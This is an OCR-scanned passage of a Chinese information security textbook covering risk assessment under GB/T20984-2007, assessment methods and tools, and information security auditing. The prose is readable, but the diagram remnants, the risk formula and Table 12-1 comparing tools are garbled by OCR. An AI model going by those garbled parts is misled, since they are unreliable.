它们 之 间 的 关系 ,如 图 12-8 所 示 。 

我 国 的 GB/T20984 一 2007 标准 (信息 安全 风险 评估 规范 ) 对 该 模型 进行 了 深化 ,如 
图 12-9 所 示 。 风 险 评 估 围 绕 着 资产 .威胁 、 脆 弱点 和 安全 措施 这 些 基本 要 素 展开 ,对 在 基 
本 要 素 的 评估 过 程 中 ,充分 考虑 业务 战略 资产 价值 ,安全 需求 .安全 事件 ,残余 风险 等 与 
这 些 基 本 要 素 相关 的 各 类 属性 。 

具体 而 言 ,风险 要 素 及 属性 之 间 的 关系 如 下 : 

(1) 业务 战略 的 实现 对 资产 具有 依赖 性 ,依赖 程度 越 高 ,要 求 其 风险 越 小 。 

(2) 资产 是 有 价值 的 ,组 织 的 业务 战略 对 资产 的 依赖 程度 越 高 ,资产 价值 就 越 大 。 
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| 威胁 脆弱 点 
抵抗 暴露 
一 一 资产 
增加 
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保护 需求 | 影响 


图 12-8 ISO/IEC13335 标准 中 风险 要 素 之 间 的 关系 


胞 弱 性 本 入 资 拥有 资产 价值 
风险 
一 
诱发 
安全 事件 了 Ce ) 


图 12-9 GB/T20984 一 2007 标准 中 风险 评估 各 要 素 关系 图 


(3) 风险 是 由 威胁 引起 的 ,资产 面临 的 威胁 越 多 则 风险 越 大 ,并 可 能 演变 成 安全 
事件 。 

(4) 资产 的 脆弱 点 可 能 暴露 资产 的 价值 ,资产 具有 的 脆弱 点 越 多 则 风险 越 大 。 

(5) 脆弱 点 是 未 被 满足 的 安全 需求 ,威胁 利用 脆弱 点 危害 资产 。 

(6) 风险 的 存在 及 对 风险 的 认识 导出 安全 需求 。 

(7) 安全 需求 可 通过 安全 措施 得 以 满足 ,需要 结合 资产 价值 考虑 实施 成 本 。 

(8) 安全 措施 可 抵御 威胁 ,降低 风险 。 

(9) 残余 风险 有 些 是 安全 措施 不 当 或 无 效 , 需 要 加 强 才 可 控制 的 风险 ;而 有 些 则 是 在 
综合 考虑 了 安全 成 本 与 效益 后 不 去 控制 的 风险 。 

(10) 残余 风险 应 受到 密切 监视 , 它 可 能 会 在 将 来 诱发 新 的 安全 事件 。 
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1223 信息 安全 风险 评估 流程 


根据 我 国 的 GB/T20984 一 2007 标准 《信息 安全 风险 评估 规范 》, 详 细 的 风险 评估 实 
施 流程 ,如 图 12-10 所 示 。 


风险 评估 准备 
L 1 1 


资产 识别 威胁 识别 脆弱 点 识别 


1 
措施 的 确认 


已 有 安全 : 


1 
[六] | 
风险 分 析 | 
1 
下 过 | 评估 过 程 文档 | 
1 1 
保持 已 有 的 安全 措施 风险 是 否 接受 | | 
1 : 1 
1 1 
制定 风险 处 理 计划 1 1 
并 评估 残余 风险 | 
+ 评 人 过 程 文档 上 | 
. 否 1 | 
风险 是 百 按 受 | “风险 评估 文档 记录 | 
是 下 1 
实施 风险 管理 
图 12-10 风险 评估 流程 图 
1. 风险 评估 准备 


该 阶段 是 整个 风险 评估 过 程 有 效 性 的 保证 。 组 织 实施 风险 评估 是 一 种 战略 性 的 考 
虑 ,其 结果 将 受到 组 织 的 业务 战略 、 业 务 流程 、 安 全 需求 、 系 统 规模 和 结构 等 方面 的 影响 ， 
因此 ,在 风险 评估 实施 前 ,应 完成 的 任务 有 : 确定 风险 评估 的 目标 ,确定 风险 评估 的 范围 ， 
组 建 适 当 的 评估 管理 与 实施 团队 ,进行 系统 调研 ,确定 评估 依据 和 方法 ,制定 风险 评估 方 
案 , 获 得 最 高 管理 者 对 风险 评估 工作 的 支持 。 

2. 资产 识别 

该 阶段 主要 完成 资产 分 类 ,资产 赋值 两 个 方面 的 内 容 。 资 产 分 类 是 进行 下 一 步 的 基 
础 ,在 实际 工作 中 ,具体 的 资产 分 类 方法 可 根据 实际 情况 的 需要 ,有 评估 值 灵活 把 握 。 一 
般 而 言 ,根据 资产 的 表现 形式 ,可 将 资产 分 为 物理 资产 ,信息 资产 、 软 件 资产 、 服 务 以 及 无 
形 资产 等 方面 。 资 产 赋值 是 指 对 资产 的 价值 或 重要 程度 进行 评估 。 一 般 地 ,资产 的 价值 
可 由 资产 在 安全 属性 上 的 达成 程度 或 其 他 安全 属性 未 达成 时 所 造成 的 影响 程度 来 决定 ， 
具体 可 分 为 保密 性 赋值 .完整 性 赋值 、 可 用 性 赋值 三 个 方面 ;然后 在 此 基础 上 ,经 过 综合 评 
定 得 到 资产 重要 性 等 级 。 当 前 综合 评定 的 常见 方法 有 加 权 平 均 原则 、 最 大 化 原则 等 。 
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3. 威胁 识别 


该 阶段 主要 完成 组 织 资产 面临 的 威胁 识别 威胁 赋值 两 个 方面 的 内 容 。 在 威胁 识别 
方面 ,当前 不 同 的 手册 给 出 了 不 同 的 威胁 分 类 方式 ,如 ISO/IEC13335-3, 德 国 的 《IT 基线 
保护 手册 》OCTAVE 等 。 一般 地 ,根据 威胁 来 源 , 威 胁 可 分 为 环境 威胁 和 人 为 威胁 ,其 
中 环境 威胁 包括 自然 界 不 可 抗力 威胁 和 其 他 物理 因素 威胁 ;人 为 威胁 包括 恶意 和 非 恶 意 
两 种 类 型 。 在 威胁 赋值 方面 ,可 以 对 威胁 出 现 的 频率 进行 等 级 化 处 理 , 不 同等 级 分 别 代 表 
威胁 出 现 的 频率 的 高 低 ;等 级 数值 越 大 ,威胁 出 现 的 频率 越 高 。 在 形成 威胁 出 现 频 率 的 评 
估 中 ,一 般 需 要 考虑 如 下 因素 : 

(1) 以 往 安全 事件 报告 中 出 现 过 的 威胁 、 威 胁 的 频率 、 破 坏 力 的 统计 。 

(2) 实际 环境 中 通过 检测 工具 以 及 各 种 日 志 发 现 的 威胁 及 其 频率 的 统计 。 

(3) 近 一 两 年 来 国际 组 织 发 布 的 对 于 整个 社会 或 特定 行业 的 威胁 出 现 频率 及 其 破坏 
力 的 统计 。 

4. 脆弱 点 识别 

该 阶段 主要 完成 脆弱 点 识别 、 脆 弱点 赋值 两 个 方面 的 内 容 。 在 脆弱 点 识别 方面 ,主要 
针对 每 一 项 需要 保护 的 资产 , 找 出 可 能 被 威胁 利用 的 弱点 ,并 对 脆弱 点 的 严重 程度 进行 评 
估 。 当 前 ,主要 从 技术 和 管理 两 个 方面 进行 ,技术 脆弱 点 涉及 物理 层 、 网 络 层 `. 系 统 层 .应 
用 层 等 各 个 层面 的 安全 问题 。 管 理 脆弱 点 又 可 分 为 技术 管理 脆弱 点 和 组 织 管理 脆弱 点 两 
方面 ,前 者 与 具体 技术 活动 相关 ,后 者 与 管理 环境 相关 。 在 脆弱 点 赋值 方面 ,一 般 是 对 脆 
弱点 被 利用 后 对 资产 损害 程度 .技术 实现 的 难 易 程 度 、. 弱 点 流行 程度 进行 评估 ,然后 以 定 
性 等 级 划分 形式 ,综合 给 出 脆弱 点 的 严重 程度 。 

5. 已 有 安全 措施 的 确认 

安全 措施 一 般 可 分 为 预防 性 安全 措施 和 保护 性 安全 措施 两 种 。 预 防 性 安全 措施 可 以 
降低 威胁 利用 脆弱 点 导致 安全 事件 发 生 的 可 能 性 ,如 入 侵 检测 系统 ;保护 性 安全 措施 可 以 
减少 因 安全 事件 发 生 后 对 组 织 或 系统 造成 的 影响 。 本 阶段 通过 对 当前 信息 系统 所 采用 的 
安全 措施 进行 标识 ,有 助 于 对 当前 信息 系统 面临 的 风险 进行 分 析 ; 同 时 分 析 其 预期 功能 和 
有 效 性 ,能 避免 不 必要 的 工作 和 费用 ,防止 安全 措施 的 重复 实施 。 

6. 风险 分 析 

该 阶段 主要 完成 风险 计算 .风险 处 理 计划 残余 风险 评估 三 个 方面 的 内 容 。 在 风险 计 
算 方面 ,主要 通过 综合 安全 事件 所 作用 的 资产 价值 及 脆弱 点 的 严重 程度 ,判断 安全 事件 造 
成 的 损失 对 组 织 的 影响 , 即 得 到 安全 风险 ,具体 过 程 如 图 12-11 所 示 。 


( 。 威 及 识别 。 ”一 | 威胁 出 现 的 频率 
LN gagrw 
可 能 性 N 
人 脆弱 点 识别 -一 脆弱 点 的 严重 程度 风险 值 
安全 事件 的 / 
损失 
(资产 识别 -| 。 资产 的 重要 性 


图 12-11 风险 值 计 算 
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一 般 地 ,安全 风险 可 形式 化 表达 为 : 
风险 值 = R(A,T,V) = R[L(T,V) Xx F(l,,V.)] 
其 中 RR 为 风险 函数 ;A,T,V 分 别 表示 资产 ,威胁 和 脆弱 点 ;1 表示 安全 事件 所 作用 的 资 
产 价值 ;V。 表示 脆弱 点 等 级 大 小 ;L 表示 威胁 利用 资产 的 脆弱 点 而 导致 安全 事件 的 可 能 
性 ;下 表示 安全 事件 发 生 后 造成 的 损失 。 

在 风险 处 理 计 划 方 面 ,主要 完成 对 不 可 接受 的 风险 的 处 理工 作 。 风 险 处 理 计 划 中 应 
明确 采取 的 弥补 脆弱 点 的 安全 措施 、 预 期 效果 实施 条 件 、 进 度 安排 .责任 部 门 等 。 在 残余 
风险 评估 方面 ,主要 用 来 评估 在 安全 措施 实施 后 ,残余 风险 是 否 降低 到 可 以 接受 的 水 平 。 
若 仍 然 不 满足 风险 水 平 的 要 求 , 则 需要 进一步 调整 风险 处 理 计 划 ,增加 相应 的 安全 措施 。 

7. 风险 评估 文档 记录 

该 阶段 主要 记录 在 整个 风险 评估 过 程 中 产生 的 评估 过 程 文档 和 评估 结果 文档 ,包括 : 
风险 评价 计划 、 风 险 评 估 程 序 、 资 产 识别 清单 、 重 要 资产 清单 .威胁 列表 、 脆 弱点 列表 \ 已 有 
安全 措施 确认 表 、 风 险 评估 报告 .风险 处 理 计划 和 风险 评估 记录 。 
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1. 信息 安全 风险 评估 方法 

评估 信息 安全 的 风险 ,首先 必须 选择 适合 本 信息 系统 的 方法 。 评 估 方 法 是 使 评估 有 
效 的 重要 因素 , 它 对 评估 过 程 中 的 每 个 具体 的 环节 都 有 直接 影响 。 评 估 方 法 除了 具备 较 
高 的 可 信和 度 外 ,还 要 尽 可 能 确保 评估 指标 的 量化 以 便 对 其 更 有 效 的 应 用 。 有 时 评估 方法 
不 同 甚至 可 能 导致 评估 结果 不 同 ,因此 ,对 评估 方法 的 选择 ,应 该 由 具体 情况 决定 选用 适 
当 的 方法 。 信 息 安 全 风险 评估 方法 根据 计算 方法 不 同 可 分 为 定性 的 评估 方法 、 定 量 的 评 
估 方 法 和 定性 与 定量 结合 的 评估 方法 。 

1) 定性 分 析 方 法 

定性 的 评估 分 析 方 法 是 一 种 采用 比较 广泛 的 模糊 分 析 方 法 。 这 种 方法 主要 依靠 专家 
的 知识 和 经 验 、 被 评估 对 象 的 相关 记录 以 及 相关 走访 调查 来 对 资源 、 威 胁 、 脆 弱点 和 现 有 
的 防范 措施 进行 系统 评估 。 它 主要 通过 与 被 调查 对 象 的 深入 访谈 、 各 种 安全 调查 表格 等 
方式 来 确定 资产 的 价值 权重 ,并 通过 一 定 的 计算 方法 确定 某 种 资产 所 面临 的 风险 的 近似 
大 小 。 

定性 分 析 方法 的 优点 有 : 操作 简单 易 行 并 且 容 易 理解 和 实施 ,不 宜 产生 不 同 的 意见 ， 
并 且 能 够 较 方 便 地 对 风险 程度 大 小 进行 排序 ;缺点 是 : 对 有 些 重 要 风险 级 别 区 分 度 欠缺 ， 
分 析 结 果 容易 偏向 主观 性 。 

定性 分 析 方 法 很 多 ,包括 小 组 讨论 (如 Delphi 方法 ) 调查. 人员 访 谈 、 问 卷 和 检查 列 
表 等 。 典 型 的 定性 分 析 方 法 如 下 : 

(1) 主观 评分 法 。 主 观 评分 法 是 凭借 专家 的 经 验 等 ,根据 评价 标准 ,让 专家 判断 可 能 
产生 的 每 个 风险 并 赋予 其 权重 ,这 里 我 们 用 “0 表示 没有 风险 , 10? 代表 风 险 很 大 ,0 一 10 
之 间 的 数字 ”表示 风险 程度 依次 加 大 ,然后 把 全 部 风险 的 权重 加 起 来 计算 出 整体 风险 水 
平 ,最 后 与 风险 评估 基准 进行 比较 ,这 里 以 故障 树 为 例 进 行 介绍 。 

(2) 故障 树 分 析 法 。 故 障 树 分 析 法 是 由 美国 贝尔 电话 实验 室 的 Watson 和 Mearns 
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于 1961 年 到 1962 年 期 间 首次 提出 并 采用 的 。 故 障 树 分 析 法 源 于 他 们 在 分 析 好 预测 民兵 
式 导弹 发 射 控 制 系统 安全 性 时 发 现 的 。 故 障 树 分 析 法 主要 应 用 遵循 从 结果 找到 原因 的 原 
则 ,将 风险 形成 的 原因 由 总 体 到 部 分 按 树 枝 形状 逐 级 细 化 ,分 析 项 目 风 险 及 其 产生 原因 之 
间 的 因果 关系 , 即 在 前 期 预测 和 识别 各 种 潜在 风险 因素 的 基础 上 ,运用 逻辑 推理 的 方法 ， 
沿 着 风险 产生 的 路 径 , 求 出 风险 发 生 的 概率 ,并 能 提供 各 种 控制 风险 因素 的 方案 。 

故障 树 分 析 法 以 其 广泛 的 应 用 、 强 大 的 逻辑 性 和 形象 化 等 特性 ,对 分 析 和 评估 比较 复 
杂 系 统 的 风险 很 有 效 。 此 外 ,该 方法 用 其 固定 的 流程 来 分 析 , 并 借助 计算 机 辅助 建树 ,其 
结果 有 系统 性 、 预 测 性 和 准确 性 的 特点 。 在 项 目 评估 中 ,故障 树 分 析 法 对 风险 管理 效率 的 
提高 作用 很 大 。 

2) 定量 分 析 方法 

定量 分 析 方 法 是 基于 定性 分 析 方 法 的 ,用 数学 的 方法 分 析 处 理 已 经 量化 的 各 项 指标 ， 
得 出 系统 安全 风险 的 量化 评估 结果 。 其 思想 是 对 构成 风险 的 各 个 要 素 和 潜在 损失 的 水 平 
赋 以 数值 ,进而 来 量化 风险 评估 的 整个 过 程 和 结果 。 常 用 的 定量 评估 方法 有 : 

(1) 决策 树 法 。 决 策 树 法 是 一 种 直观 运用 概率 分 析 的 图 解法 。 如 果 已 知 各 种 情况 的 
发 生 概 率 ,就 可 以 通过 构成 决策 树 求 取 净 现 值 的 期 望 值 的 概率 ,以 此 评价 项 目 风 险 并 判断 
其 可 行 性 的 决策 分 析 方 法 。 决 策 树 方法 因 其 形象 化 、 清 晰 有 效 和 特有 的 结构 模型 的 特点 
非常 利于 项 目 执行 人 员 进 行 集体 分 析 和 探讨 。 

(2) 模糊 综合 评价 法 。 模 糊 评价 法 是 对 模糊 系统 进行 分 析 的 基本 方法 之 一 ,多 用 于 
目标 决策 。 对 在 评估 过 程 中 所 带 有 主观 性 的 问题 以 及 客观 遇 到 的 模糊 现象 ,模糊 评价 都 
可 以 进行 有 效 的 处 理 。 模 糊 评价 是 在 模糊 条 件 下 ,考虑 多 种 因素 影响 ,为 了 某 一 目的 而 反 
对 事物 做 出 决策 的 一 种 综合 决策 方法 。 

模糊 综合 评价 法 是 利用 模糊 数学 中 的 模糊 变换 原理 和 最 大 隶属 度 原 则 对 被 评价 事物 
相关 的 各 个 因素 做 出 的 综合 评价 。 该 评价 方法 着 眼 于 各 个 相关 因素 。 

(3) 层次 分 析 法 。 层 次 分 析 法 (Analytic Hierarchy Process,AHP) 是 美国 著名 的 运 
筹 学 家 T. L. Satty 教授 在 20 世纪 70 年 代 提出 的 ,一 种 有 效 简便 灵活 处 理 不 易 定 量化 而 
又 实用 的 一 种 定向 与 定量 相 结合 的 、 层 次 化 的 多 准则 决策 方法 。 层 次 分 析 法 的 核心 是 将 
负责 的 问题 进行 层次 化 ,将 原 问 题 简单 化 并 在 层次 基础 上 进行 分 析 ; 它 把 决策 者 的 主观 判 
断 量 化 ,以 数量 形式 进行 表达 和 处 理 , 通 过 定量 形式 的 数据 将 定性 和 定量 分 析 相 结合 从 而 
帮助 决策 者 进行 决策 。 

3) 定性 与 定量 结合 的 分 析 方法 

定性 分 析 要 求 分 析 者 具有 一 定 的 能 力 和 经 验 , 且 分 析 基 于 主观 性 ,其 结果 很 难 统一 ; 
而 定量 分 析 依赖 大 量 的 统计 数据 , 且 分 析 基 于 客观 ,其 结果 很 直观 ,容易 理解 。 另 外 ,信息 
安全 风险 评估 是 一 个 复杂 的 过 程 , 涉 及 多 个 因素 、 多 个 层面 ,具有 不 确定 性 , 它 是 一 个 多 约 
东 条 件 下 的 多 属性 决策 问题 。 而 在 实际 评估 中 ,有 些 要 素 的 量化 很 容易 ,而 有 些 却 是 很 困 
难 甚 至 是 不 可 能 的 。 如 果 单 纯 地 使 用 定性 或 定量 的 方法 ,对 风险 有 效 的 评估 则 是 很 难 的 。 
因此 将 两 种 方法 相 结合 对 风险 进行 评估 才能 得 出 更 有 效 的 结论 。 

2. 信息 安全 风险 评估 工具 
风险 评估 工具 是 随 着 人 们 在 对 信息 安全 风险 评估 不 断 认 识 以 及 对 评估 过 程 不 断 完 善 
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的 过 程 中 逐渐 发 展 的 。 随 着 人 们 对 信息 资产 的 深入 理解 ,发 现 信息 资产 不 只 包括 存在 与 
计算 机 环境 中 的 数据 文档 ,信息 在 组 织 中 的 各 种 载体 中 传播 ,包括 纸 质 载 体 , 人 员 等 , 因 
此 信息 安全 包括 更 广泛 的 范围 。 同 时 ,信息 安全 管理 者 发 现 解决 信息 安全 的 问题 在 于 预 
防 , 而 不 是 简单 的 防御 ,因此 ,许多 国家 和 组 织 都 建立 了 针对 预防 安全 事件 发 生 的 风险 评 
估 指 南 和 方法 。 基 于 这 些 方法 ,同时 也 开发 了 大 量 的 风险 评估 工具 ,如 CRAMM、RA 等 。 
目前 风险 评估 过 程 常用 的 是 一 些 专用 的 自动 化 的 风险 评估 工具 ,无 论 是 商用 的 还 是 
免费 的 ,此 类 工具 都 可 以 有 效 地 通过 输入 数据 来 分 析 风 险 , 最 终 给 出 对 风险 的 评价 并 推荐 
相应 的 安全 措施 。 对 于 目前 最 常见 的 自动 化 评估 工具 的 比较 如 表 12-1 所 示 。 


表 12-1 常见 的 自动 化 评估 工具 的 比较 


工具 名 称 COBRA RA CRAMM @RISK BDSS 
竹 织 /国家 | CSA 系统 安全 | 英国 标准 协会 ss Palisade 公司 /| 综合 风险 管理 

/ 国 公司 /英国 。 |(BSD/ 英 国 。 | 电信 美国 组 织 /美国 
体系 结构 。 ”|C/S 模 式 。 ”| 单机 版 单机 版 单机 版 单机 版 


采用 方法 专家 系统 过 程式 算法 过 程式 算法 专家 系统 专家 系统 
定性 /定量 算法 | 定性 /定量 结合 | 定性 /定量 结合 | 定性 /定量 结合 | 定性 /定量 结合 | 定性 /定量 结合 
数据 采集 形式 | 调查 问卷 过 程 过 程 调查 问卷 调查 问卷 


对 使 用 人 员 的 | 让 第 要 有 有 导 险 依靠 评估 人 的 | 依 和 评估 人 的 知 全 个 如 二 | 生生 有 人 
要 求 知识 和 经 验 。 “| 识 和 经 验 . 
知识 知识 知识 
风险 等 级 与 控 | 风险 等 级 与 控制 
结果 报告: 风险 
制 措施 (基于 | 措施 (基于 和 安全 防护 措施 
久久 出 形式 | 等 级 与 控 抽 |Bs7o9 提供 的 | Bsr799 凶 供 的 | 次 和 支持 信息 | 列表 


控制 措施 ) 控制 措施 ) 


从 表 12-1 可 以 看 出 ,这 五 种 著名 的 自动 化 评估 工具 从 发 布 的 组 织 /国家 、 体 系 结构 、 
评估 所 采用 的 方法 .风险 分 析 计算 的 方法 等 几 个 方面 来 看 具有 其 共同 点 也 有 其 自身 的 
特点 。 

(1) 从 发 布 的 组 织 /国家 来 看 ,主要 是 英国 和 美国 等 国家 ,我 国 现在 还 没有 一 种 自动 
化 评估 工具 软件 得 到 国际 上 的 认可 。 

(2) 从 体系 结构 来 看 ,这 些 工具 具有 一 定 的 共同 点 ,大 都 是 单机 版 ,只 有 COBRA 采 
用 了 C/S 模式 ,采用 这 种 模式 可 以 将 数据 库 和 客户 端 进行 分 离 , 保 证 了 系统 的 可 维护 性 ， 
实践 中 只 要 不 断 丰 富 完善 数据 库 就 可 以 对 工具 进行 更 新 。 

(3) 评估 方法 和 数据 采集 方式 的 使 用 是 具有 相关 性 的 ,RA 和 CRAMM 是 使 用 传统 
的 过 程式 算法 ,造成 它们 的 数据 采集 方式 都 是 过 程式 的 ,这 种 方法 具有 流程 单一 ,不 能 适 
应 实际 评估 目标 情况 的 缺点 ;而 更 多 的 工具 采用 了 专家 系统 和 调查 问卷 的 方法 ,专家 系统 
可 以 使 评估 工具 发 挥 更 大 的 作用 ,结合 调查 问卷 和 背后 强大 知识 库 的 支持 ,可 以 适应 实际 
评估 中 多 变 的 情况 ,更 好 地 完成 对 被 评估 系统 风险 要 素 情况 的 采集 ,并 且 可 以 更 有 效 地 分 
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析出 被 评估 系统 的 风险 状况 。 

(4) 对 使 用 者 的 要 求 是 不 断 降低 的 趋势 ,大 多 数 自动 化 评估 工具 不 需要 具有 专业 风 
险 评估 知识 的 使 用 者 。 

(5) 在 结果 输出 来 看 ,各 种 工具 的 输出 都 侧重 了 不 同 的 方向 ,不 过 根据 被 评估 系统 的 
风险 状况 提出 有 效 的 控制 措施 是 基本 的 功能 。 


12.3 信息 安全 审计 


审计 (Auditb) 是 指 由 专 设 机 关 依 照 法 律 对 国家 各 级 政府 及 金融 机 构 、 企 业 事业 组 织 的 
重大 项 目 和 财务 收 支 进 行事 前 和 事后 的 审查 的 独立 性 经 济 监督 活动 。 审 计 是 一 种 经 济 监 
督 活动 ,经 济 监督 是 审计 的 基本 职能 。 通 常 , 审 计 主 要 是 指 财务 审计 。 但 是 随 着 企业 信息 
系统 的 广泛 应 用 和 计算 机 网 络 的 普及 ,企业 的 经 营 模式 发 生 了 根本 性 的 变革 ,企业 传统 的 
内 部 审计 也 带 来 了 巨大 的 挑战 ,IT 审计 成 为 审计 的 重要 内 容 , 审 计 的 内 容 和 审计 的 方式 
发 生 了 重要 变化 。 中 国内 部 审计 协会 2013 年 发 布 的 第 2203 号 内 部 审计 具体 准则 一 一 信 
息 系统 审计 ,对 信息 系统 审计 提出 了 具体 要 求 ,其 中 也 包括 信息 安全 审计 的 内 容 。 信 息 系 
统 审计 也 称 为 IT 审计 ,信息 安全 审计 是 其 重要 内 容 , 要 做 好 IT 审计 必须 深入 了 解 信息 
安全 。 特 别 是 随 着 信息 化 的 深入 ,信息 安全 审计 重要 性 越 来 越 突出 。 
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信息 安全 审计 是 IT 审计 和 信息 系统 审计 的 重要 组 成 部 分 。 国 家 审计 机 关 已 经 开展 
的 信息 系统 审计 工作 中 ,信息 安全 审计 是 其 重要 内 容 之 一 。 我 国 银监会 ,证监 会 等 多 个 行 
业 监 管 部 门 均 已 出 台 相 关 政 策 ,要 求 建立 信息 安全 审计 制度 ,定期 实施 信息 安全 审计 。 信 
息 安 全 审计 已 经 成 为 一 种 重要 的 职业 。 信 息 安全 审计 师 (Certified Information Security 
Professional-Auditor,CISP-Auditor) 是 中 国信 息 安 全 测评 中 心 (CNITSEC) 在 CISP 现 
有 人 员 资 格 认证 注册 工作 的 基础 上 ,于 2012 年 推出 的 一 项 信息 安全 专业 人 员 资 格 认 
证 项 目 , 是 国家 对 信息 安全 审计 人 员 资 质 的 最 高 认可 。 中 国信 息 安 全 测评 中 心 鼓 励 从 
事 信息 安全 审计 和 信息 系统 审计 岗位 的 工作 人 员 取 得 国家 注册 信息 安全 审计 师 认证 
资格 。 

CISP-Auditor 注册 人 员 应 掌握 两 部 分 内 容 : 信息 安全 基础 知识 ,信息 安全 审计 知识 。 
信息 安全 审计 知识 将 重点 关注 传统 财政 财务 收 支 审计 信息 系统 审计 的 方法 和 流程 \ 信 息 
安全 控制 措施 的 审计 实务 以 及 在 实际 审计 过 程 中 可 能 用 到 的 审计 工具 。 在 整个 注册 信息 
安全 审计 师 (CISP-Auditor) 的 知识 体系 结构 中 , 共 包 括 信息 安全 保障 概述 、 信 息 安全 技 
术 、 信 息 安 全 管理 、 信 息 安 全 工程 .信息 安全 标准 法 规 、 信 息 安全 审计 基础 、 信 息 安全 审计 
方法 与 流程 .信息 安全 控制 审计 实务 、 信 息 安全 计算 机 辅助 审计 技术 这 九 个 知识 类 。 

下 面 介 绍 有 关 信 息 安 全 审计 的 几 个 概念 。 

(1) 独立 性 。 独 立 性 是 审计 部 门 的 基本 原则 之 一 。 几 乎 所 有 的 审计 部 门 都 强调 , 审 
计 的 独立 性 是 审计 成 功 的 关键 之 一 .是 审计 结果 权威 性 和 公正 性 的 基础 。 

审计 独立 性 是 指 审计 师 不 受 那些 会 削弱 或 可 能 是 合理 的 估计 但 仍 会 削弱 审计 师 做 出 
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无 偏 审计 决策 能 力 的 压力 及 其 他 因素 的 影响 。 其 对 审计 工作 来 讲 至 关 重 要 。 因 为 涉及 市 
场 经 济 的 利益 公平 ,独立 性 被 职业 界 视 为 审计 的 灵魂 。 

(2) 内 部 控制 。 内 部 控制 (internal controls) 是 指 一 个 单位 的 各 级 管理 层 , 为 了 保护 
其 经 济 资源 的 安全 ,完整 ,确保 经 济 和 会 计 信息 的 正确 可 靠 ,协调 经 济 行为 ,控制 经 济 活 
动 , 利 用 单位 内 部 分 工 而 产生 的 相互 制约 ,相互 联系 的 关系 ,形成 一 系列 具有 控制 职能 的 
方法 措施、 程序 ,并 予以 规范 化 ,系统 化 ,使 之 成 为 一 个 严密 的 、 较 为 完整 的 体系 。 审 计 的 
主要 任务 就 是 为 了 改善 企业 的 内 部 控制 状态 。 

内 部 控制 的 类 型 : 预防 性 控制 、 侦 测 性 控制 .反应 性 控制 。 这 三 种 内 部 控制 的 作用 分 
别 是 阻止 不 良 事件 的 发 生 ,事件 发 生 后 进行 侦 测 ,反应 是 介 于 二 者 之 间 的 控制 。 例 如 : 软 
件 变 更 的 控制 ,访问 控制 、 灾 备 控制 等 。 

(3) 信息 安全 审计 的 过 程 。 信 息 安 全 审计 的 过 程 分 为 6 阶段 , 即 计划 、 实 地 考察 与 制 
作文 档 、 发 现 问题 和 验证 问题 .制定 解决 方案 .起草 并 发 布 报告 .问题 跟踪 。 

在 开始 审计 之 前 ,必须 确定 你 计划 审计 什么 。 计 划 的 目标 是 确定 审计 的 对 象 和 范围 ， 
一 个 有 效 的 计划 是 审计 成 功 的 关键 。 在 计划 阶段 ,主要 任务 包括 : 接受 审计 任务 、 进 行 初 
步调 查 . 了 解 客户 需求 , 列 出 检查 清单 .开展 研究 .进行 评估 制定 进度 表 、 召 开会 议 。 

在 审计 完成 后 ,需要 提交 审计 报告 ,记录 审计 的 过 程 和 审计 的 结果 。 

审计 师 普遍 的 感觉 只 要 审计 报告 一 经 发 布 ,那么 审计 工作 就 算 完 成 了 。 然 而 ,发 布 一 
个 报告 对 于 公司 来 说 只 是 发 现 了 问题 ,并 没有 解决 问题 。 审 计 工 作 在 审计 中 发 现 的 问题 
未 被 解决 之 前 都 称 为 审计 没有 真正 的 完成 。 审 计 部 门 必 须要 开发 一 个 程序 ,以 使 其 中 的 
成 员 能 够 有 能 力 追 踪 问 题 ,直到 问题 被 解决 。 
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在 各 行 各 业 ,信息 安全 在 IT 管理 中 的 关注 度 越 来 越 高 ,企业 对 信息 安全 的 资金 投入 
也 越 来 越 大 。 信 息 化 初期 , 仅 是 投入 单一 的 安全 技术 与 产品 ,目前 已 过 渡 到 信息 安全 的 整 
体 解 决 方案 。 同 时 ,IT 外 包 也 是 行业 发 展 趋势 ,信息 安全 审计 工作 除了 企业 自身 进行 内 
审 外 ,邀请 具有 适当 资质 的 独立 第 三 方 进行 外 审 ,也 是 未 来 发 展 的 趋势 。 

实施 信息 系统 安全 审计 可 以 起 到 以 下 作用 。 

(1) 驱动 业务 增值 。 组 织 机构 可 通过 审计 ,确保 信息 系统 所 产生 数据 的 真实 性 、 完 整 
性 和 可 靠 性 ,切实 落实 合适 的 IT 治理 模式 ,使 IT 治理 成 为 组 织 机 构 的 战略 性 资源 ,为 业 
务 增值 。 

(2) 提升 IT 管理 。 通 过 对 网 络 或 系统 的 脆弱 性 ` 有 效 性 等 进行 测试 .评估 和 分 析 ,发 
现 控制 缺陷 或 漏洞 ,并 提出 整改 加 固 的 建议 ,可 促进 被 审计 机 构 提高 IT 管理 水 平 , 从 而 
提高 业务 经 济 效益 。 

(3) 健全 内 控制 度 。 通 过 审计 ,对 信息 系统 的 管理 流程 进行 诊断 ,客观 中 立地 指出 
IT 建设 和 运 维 过 程 中 的 风险 ,帮助 组 织 机 构建 立 健全 的 内 控制 度 。 

信息 安全 审计 涉及 信息 安全 的 各 个 方面 ,具体 包括 : 

。 实体 级 (Entity-Level) 控 制 审计 。 

。 数 据 中 心 与 灾 备 审计 。 
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路 由 器 交换机、 防火 墙 审计 。 

操作 系统 审计 ,包括 Windows、UNIX、Linux 等 。 
。 Web 服务 器 和 Web 应 用 审计 。 

。 数据 库 审计 。 

。 存储 审计 。 

。 虚拟 化 环境 审计 。 

。 WLAN 和 移动 设备 审计 。 

。 应 用 审计 。 

。 云 计算 和 外 包 服 务 审 计 。 

。 项 目 审计 。 
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与 西方 发 达 国 家 相 比 ,我 国 的 IT 安全 审计 工作 起 步 比较 晚 ,与 之 关联 的 安全 审计 技 
术 .安全 审计 准则 和 审计 制度 等 尚 待 进一步 完善 。 国 内 的 信息 系统 安全 审计 发 展 经 历 了 
两 个 阶段 : 

1. 信息 系统 安全 审计 的 引进 阶段 

1999 年 ,财政 部 发 布 了 《独立 审计 准则 第 20 号 一 计算 机 信息 系统 环境 下 的 审计 》, 该 
准则 在 部 分 内 容 上 参考 并 借鉴 了 国外 的 针对 审计 方便 的 研究 成 果 。 这 是 国内 首次 提出 要 
针对 计算 机 信息 系统 实施 审计 的 要 求 。 同 年 ,国家 质量 技术 监督 局 颁布 了 《GB17859 
1999 计算 机 信息 系统 安全 保护 等 级 划分 准则 》, 该 准则 用 于 实施 计算 机 信息 系统 安全 保 
护 等 级 及 测评 ,是 实施 安全 等 级 保护 管理 的 基础 性 标准 ,其 中 明确 要 求 了 针对 不 同安 全 级 
别 的 信息 系统 ,实施 不 同安 全 等 级 的 安全 控制 要 求 , 来 防范 未 授权 的 访问 以 及 维护 信息 系 
统 受 到 破坏 时 候 的 访问 审计 总 记录 。 

